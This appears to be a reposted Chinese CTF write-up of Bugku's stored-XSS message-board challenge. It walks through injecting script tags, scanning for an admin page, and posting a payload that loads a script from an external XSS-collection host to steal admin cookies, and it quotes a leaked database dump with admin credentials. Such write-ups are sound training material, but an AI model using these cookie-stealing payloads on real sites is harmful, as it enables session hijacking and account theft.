当前位置: 首页 > news >正文

BUGKU-WEB 留言板

题目描述

在这里插入图片描述

  • 题目无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台
  • 打开场景后界面如下:

在这里插入图片描述

解题思路

  • 看到此类的题目,应该和存储型xss有关,也就是将恶意代码保存到服务器端
  • 即然在服务器端,那就是会在后台弹出窗口了
  • 所以需要找到后台地址,看看能不能爆破进入,但是题目提示了说不需要登录后台,需要使用xss平台来接收cookies

相关工具

  • 目录扫描工具:御剑
  • 或者dirsearch工具:python dirsearch.py -u url
  • url解码:https://www.iamwawa.cn/urldecode.html

解题步骤

  1. 测试一下script代码:
<script>alert(1)</script>

在这里插入图片描述
发现确实可以读取到。

使用目录扫描工具-御剑进行扫描试试
在这里插入图片描述
得到后台管理地址:http://114.67.175.224:10687/admin.php
在这里插入图片描述
账号密码不知道?
需要注意的是:该题目提示了无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台
所以,我们需要找一个xss平台(https://xssaq.com/),目前我找到的这个是免费可用的,其他的都需要付费。
在这里插入图片描述
然后创建一个项目:
在这里插入图片描述

<sCRiPt sRC=//uj.ci/k3a></sCrIpT>

将项目中提供的代码输入留言板中:
在这里插入图片描述
然后,返回项目中查看效果:
在这里插入图片描述
这个时候就获取到cookies了,这就是我们需要的flag,注意记得转码(%7B 和%7D):

flag%7B826066e999f695cacd75a92ac9a0ac09%7D

在这里插入图片描述
所以就得到了falg:

flag{826066e999f695cacd75a92ac9a0ac09}

之前该题目是有个数据库文件db.sql文件,可以直接在扫描目录的时候就得到,内容如下:

# Host: localhost  (Version: 5.5.53)
# Date: 2019-08-04 16:13:22
# Generator: MySQL-Front 5.3  (Build 4.234)/*!40101 SET NAMES utf8 */;#
# Structure for table "text"
#CREATE DATABASE xss DEFAULT CHARACTER SET utf8;
use xss; DROP TABLE IF EXISTS `text`;
CREATE TABLE `text` (`Id` int(11) NOT NULL AUTO_INCREMENT,`text` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "text"
#/*!40000 ALTER TABLE `text` DISABLE KEYS */;
/*!40000 ALTER TABLE `text` ENABLE KEYS */;#
# Structure for table "user"
#DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (`Id` int(11) NOT NULL AUTO_INCREMENT,`username` varchar(255) DEFAULT NULL,`password` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "user"
#/*!40000 ALTER TABLE `user` DISABLE KEYS */;
INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');
/*!40000 ALTER TABLE `user` ENABLE KEYS */;

可以发现,在最后有一行插入语句:

可以看到INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');
账号admin,密码011be4d65feac1a8

这就是我们需要的账号密码,登入后发现弹出了弹窗:
在这里插入图片描述
但是,我们并没有得到我们想要的falg,那该如何?当然是获取cookies了:
直接F12,查看cookies即可:
在这里插入图片描述
或者直接在留言板中输入获取cookies的代码,在登录后台的时候自动弹出:

<script>alert(document.cookie)</script>

就像这样:
在这里插入图片描述

得到Flag

flag{826066e999f695cacd75a92ac9a0ac09}

在这里插入图片描述

新知识点

  1. 学会使用目录扫描工具
  2. 认识熟悉常见的url编码
http://www.lryc.cn/news/300259.html

相关文章:

  • Linux之动静态库
  • 手机常亮屏不自动灭屏
  • JVM(1)基础篇
  • 相机图像质量研究(12)常见问题总结:光学结构对成像的影响--炫光
  • [OPEN SQL] 删除数据
  • C语言第二十五弹---字符函数和字符串函数(上)
  • 寒假学习记录16:Express框架(Node)
  • 机器学习中的10种非线性降维技术对比总结
  • [ubuntu]split命令分割文件
  • 《小强升职记:时间管理故事书》阅读笔记
  • visual studio code could not establish connection to *: XHR failed
  • JVM-面试题
  • 计算机网络——多媒体网络
  • GPIO八种工作模式
  • C++初阶:适合新手的手撕list(模拟实现list)
  • js手写Promise(上)
  • 基于Web技术的家居室内温湿度监测系统
  • ubuntu22.04@laptop OpenCV Get Started: 009_image_thresholding
  • Zeek实战—快速构建流量安全能力
  • vim命令编辑完文件后,按ESC键退出编辑模式,无法进入命令模式解决方案
  • 【生产实测有效】Linux磁盘清理常用命令
  • 练习:鼠标类设计之1_类内容解析
  • 消息队列RabbitMQ-使用过程中面临的问题与解决思路
  • 搜索Agent方案
  • 排序算法---计数排序
  • STM32——LCD(1)认识
  • iTop-4412 裸机程序(二十二)- RTC时钟
  • Kafka 之 AdminClient API
  • Flutter run 一直 Running Gradle task ‘assembleDebug’…
  • kali无线渗透之用wps加密模式破解出wpa模式的密码12